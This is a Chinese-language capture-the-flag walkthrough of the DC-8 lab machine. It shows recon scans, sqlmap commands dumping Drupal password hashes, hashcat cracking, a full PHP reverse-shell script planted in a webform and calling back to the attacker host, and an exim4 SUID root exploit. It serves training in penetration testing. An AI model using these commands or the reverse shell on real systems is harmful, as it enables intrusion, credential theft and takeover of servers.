DC-8
author:leadlife
data:2023/5/18
blog:https://tripse.github.io/
本次测试使用到的工具如下:
- 信息收集:nmap、fscan、cmseek、searchsploit
- 获取 SHELL:无
- 漏洞利用:SQLmap
- 暴力破解:hashid、hashcat
- FUZZ:无
- 辅助工具:无
- 权限提升:无
外部信息收集
Nmap ICMP 扫描发现主机
本次靶机 IP 10.10.10.138
sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:09 CST
Nmap scan report for 10.10.10.138
Host is up (0.00020s latency).
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:EF:7D:81 (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.35 seconds
Fsacn 探测开放端口
sudo fscan -h 10.10.10.138 -p 0-65535 -t 30
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.138 is alive
[*] Icmp alive hosts len is: 1
10.10.10.138:22 open
10.10.10.138:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://10.10.10.138 code:200 len:7924 title:Welcome to DC-8 | DC-8
已完成 2/2
[*] 扫描结束,耗时: 5.851445651s⏎
Nmap 进行详细端口扫描
sudo nmap -sS -sV -sC -O -T4 --min-rate 10000 -oN nmap.all 10.10.10.138 -p22,80
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:10 CST
Nmap scan report for 10.10.10.138
Host is up (0.00027s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
| 256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_ 256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open http Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds
判断 CMS
访问 web 页面发现是 drupal
CMSeek 判断 CMS 版本
searchsploit 搜寻 cms 版本漏洞
drupal 7 版本存在 RCE 以及 SQL
获取 SHELL
尝试利用 exp
均失败,这里怀疑作者做了一些修改,也有可能是环境原因,那么进行手工测试
SQL 注入获取 Hash
http://10.10.10.138/?nid=1
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment
获取数据库:
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment --dbs
获取表名:
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db --tables
+-----------------------------+
| block |
| cache |
| filter |
| history |
| role |
| system |
| actions |
| authmap |
| batch |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+
获取 users 字段:
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db -T users --columns
获取账户密码:
sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db -T users -C "name,pass" --dump
Database: d7db
Table: users
[2 entries]
+--------+---------------------------------------------------------+
| name | pass |
+--------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+---------------------------------------------------------+
识别 hash
离线破解 Hash
尝试在线站点破解,失败,操作离线破解,先用 hashid 拿到编号
leadlife@endeavrouOS /o/s/tamper> hashid -m
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
Analyzing '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
[+] Drupal > v7.x [Hashcat Mode: 7900]
hashcat -a 0 -m 7900 hash.txt /usr/share/seclists/Passwords/probable-v2-top12000.txt
拿到 john 的密码:
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF:turtle
后台 GetSHELL
登入后台:http://10.10.10.138/user/
点击 Contact Us:
再点击 Webform,可直接添加 php 代码进行 getshell
编辑内容为 php-reverse-shell:
<p>Thanks for taking the time to contact us. We shall be in contact soon.</p>
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
修改为 php-code 最后保存即可,本地监听:
nc -lvnp 1234
随便编辑内容提交,即可反弹 SHELL
优化 SHELL
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/$ export TERM=xterm
内部信息收集
内核与发行版
SUID
exim4
SUDO
no sudo
权限提升
利用 SUID exim4 提权
利用 Python 传输,然后运行即可:
www-data@dc-8:/tmp$ bash 46996.sh -m netcat
bash 46996.sh -m netcat
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Thu, 18 May 2023 23:22:48 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1pzdai-0004rL-Bo
221 dc-8 closing connection
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# cd /root
root@dc-8:/root# ls
flag.txt
root@dc-8:/root# cat flag.txt
Brilliant - you have succeeded!!!
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.
239
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
